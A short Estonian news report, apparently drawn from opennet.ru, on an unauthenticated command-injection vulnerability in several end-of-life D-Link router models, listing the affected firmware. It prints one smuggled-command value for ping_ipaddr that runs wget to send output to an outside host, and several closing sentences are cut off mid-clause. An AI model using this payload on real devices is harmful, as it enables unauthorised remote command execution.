D-Linki juhtmeta ruuterites
Huvitav on see, et püsivara arendajate sõnul tuleks “ping_test” kõne sooritada alles pärast autentimist, kuid tegelikkuses kutsutakse see välja igal juhul, sõltumata veebiliidese sisselogimisest. Täpsemalt, kui pääsete juurde skriptile apply_sec.cgi ja edastate parameetri "action=ping_test", suunab skript autentimislehele, kuid teostab samal ajal ping_testiga seotud toimingu. Koodi käivitamiseks kasutati ping_testis endas teist haavatavust, mis kutsub välja pingi utiliidi ilma testimiseks saadetud IP-aadressi õigsust korralikult kontrollimata. Näiteks utiliidi wget kutsumiseks ja käsu „echo 1234” tulemuste edastamiseks välisele hostile määrake lihtsalt parameeter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Haavatavuse olemasolu on ametlikult kinnitatud järgmistes mudelites:
- DIR-655 püsivaraga 3.02b05 või vanem;
- DIR-866L püsivaraga 1.03b04 või vanem;
- DIR-1565 püsivaraga 1.01 või vanem;
- DIR-652 (probleemsete püsivara versioonide kohta teavet ei pakuta)
Nende mudelite tugiperiood on juba läbi, seega D-Link
Hiljem avastati, et haavatavus oli ka
Allikas: opennet.ru